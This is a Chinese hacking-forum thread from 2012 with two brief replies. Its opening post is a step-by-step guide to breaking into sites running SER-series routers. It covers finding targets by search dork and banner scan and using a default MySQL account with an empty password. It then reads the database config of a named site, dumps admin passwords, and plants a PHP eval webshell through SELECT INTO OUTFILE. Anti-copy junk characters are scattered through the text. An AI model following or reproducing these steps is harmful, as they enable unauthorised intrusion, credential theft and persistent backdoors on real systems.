找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3063|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
  p$ _( b- |+ m3 _& N) X* t3 h4 J( i5 p. Z6 A
1:google搜索'Raonet Subscriber Ethernet Router'% v  s: a+ p# q0 D3 S/ ~' t% t
3 C. K. e6 k) n' p+ p
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
0 C; l% a& [* _
: B, Q( X- |) o' y" D/ t3 ~4 d3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
  s* w0 }& H6 d1 Y' W0 `$ w; ^" H' O& T
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......; A1 i6 E4 n- _, D5 o2 n" k  X
* }+ f5 \4 ?( l! \) s+ L
* S+ S$ E4 D0 U9 V
; o8 n/ H, n$ d
入侵步骤:
( t$ p' O, A5 h8 Q) `! M4 ]$ c: R8 ^
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php% K: J0 T* B# l$ f$ W% C/ I
+ L7 m# K3 t( z5 x
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc; p% h) W! E5 t2 m
3:得到密码后连接,查看GUI管理密码:( j% M2 S, T1 J6 y6 C3 C8 J0 X3 b
use ser_500
- R; j9 [8 @  q! b( \select id,passwd from user;
! I# F, T0 }5 |+ ?" |+ s; Y! ^4:通过数据库写入webshell,执行命令:% K! @  |( r/ b+ b/ e  {+ A- W
use mysql;
, P* w* ~4 d3 S+ Mcreate table ok(cmd TEXT);
/ `8 r2 W& d  y. G* |' T) Binsert into ok values("<?php @eval($_POST[cmd])?>");
/ P) j) b7 @) Hselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
* P$ w( C' N! l( Qdrop table ok;# \2 b" E: J* M8 ~# p2 H

* }. Z0 g  F- s5 z5:连接后门shell.php 2 E/ r$ l/ n% Y* m

6 ~6 k, N6 h8 E  X+ b) u* @, L6. 搞定!
; Z9 _7 }& t- ]
" l$ _6 R5 h* K* w- W9 A
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表